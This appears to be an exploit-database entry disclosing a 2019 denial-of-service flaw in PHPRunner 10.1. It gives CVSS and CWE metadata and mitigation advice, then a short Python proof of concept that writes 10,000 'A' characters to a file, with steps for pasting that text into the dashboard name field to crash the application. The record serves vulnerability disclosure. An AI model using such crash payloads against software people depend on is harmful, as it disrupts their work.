PHPRunner 10.1 - Denial of Service (PoC)

vendor:

PHPRunner

by:

Victor Mondragón

7.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: PHPRunner

Affected Version From: 10.1

Affected Version To: 10.1

Patch Exists: YES

Related CWE: N/A

CPE: a:xlinesoft:phprunner:10.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 Service Pack 1 x64

2019

PHPRunner 10.1 – Denial of Service (PoC)

A denial of service vulnerability exists in PHPRunner 10.1 when a maliciously crafted input is supplied to the application. An attacker can leverage this vulnerability to crash the application.

Mitigation:

Upgrade to the latest version of PHPRunner 10.1 or later.

Source

Exploit-DB raw data:

#Exploit Title:  PHPRunner 10.1 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-09
#Vendor Homepage: https://xlinesoft.com/
#Software Link: https://xlinesoft.com/phprunner/download.htm
#Tested Version: 10.1
#Tested on: Windows 7 Service Pack 1 x64 

#Steps to produce the crash:
#1.- Run python code: PHPRunner_10_1.py
#2.- Open PHPRunner_10_1.txt and copy content to clipboard
#3.- Open PHPRunner
#4.- Click on "Next" > Select "Microsoft Access" database > click on "Next"
#5.- Click on "Create new database" > click on "Create table"
#6.- Select "Create dashboard" > in "Name" field Paste Clipboarad
#7.- Click on "Ok"
#8.- Crashed

cod = "\x41" * 10000
f = open('PHPRunner_10_1.txt', 'w')
f.write(cod)
f.close()